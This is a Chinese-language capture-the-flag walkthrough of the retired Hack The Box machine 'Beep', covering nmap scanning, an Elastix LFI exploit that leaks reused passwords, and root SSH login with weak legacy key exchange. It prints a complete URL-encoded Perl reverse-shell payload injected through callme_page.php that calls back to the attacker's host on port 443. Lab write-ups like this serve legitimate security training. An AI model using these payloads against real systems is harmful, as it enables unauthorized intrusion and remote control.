本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.7
nmap -sV -sC -p- -oN beep.nmap 10.10.10.7
nmap扫描结果
开放了很多端口,先看web应用
爆破下目录看看
上面先放着既然知道目标靶机使用的程序名称,那么根据关键字搜索下是否可利用的exploit
试了下上述给的exploit,其中LFI是比较靠谱的,对应的exploit是37637.pl https://www.exploit-db.com/exploits/37637
直接利用
显示不友好,查看网页源码
发现很多都是共同使用上述标记的密码,直接使用ssh进行连接
发现报错,复制上面的报错丢到网上搜索下发现原因是Terminal找不到支持的密钥交换方法,因为新版Openssh中认为SHA1这种hash散列算法过于薄弱,已经不再支持,所以我们需要手动去允许对于SHA1的支持 ,所以可以确认目标靶机是使用的低版本的弱加密算法,而本机的kali是使用的最新版ssh,不支持旧版的,需要指定加密算法进行ssh连接即可
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 10.10.10.7 -l root
成功登录到目标靶机,直接读取root.txt 和user.txt
根据下面提到的exploitdb 提炼出手动和自动弹shell的操作
https://www.exploit-db.com/exploits/37637
https://www.exploit-db.com/exploits/18650
https://www.exploit-db.com/exploits/21851
手动利用
https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.4%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
本机使用nc监听443即可
使用burpsuite手动利用webmin 根据:https://www.exploit-db.com/exploits/21851
自动利用
下面是根据:https://www.exploit-db.com/exploits/21851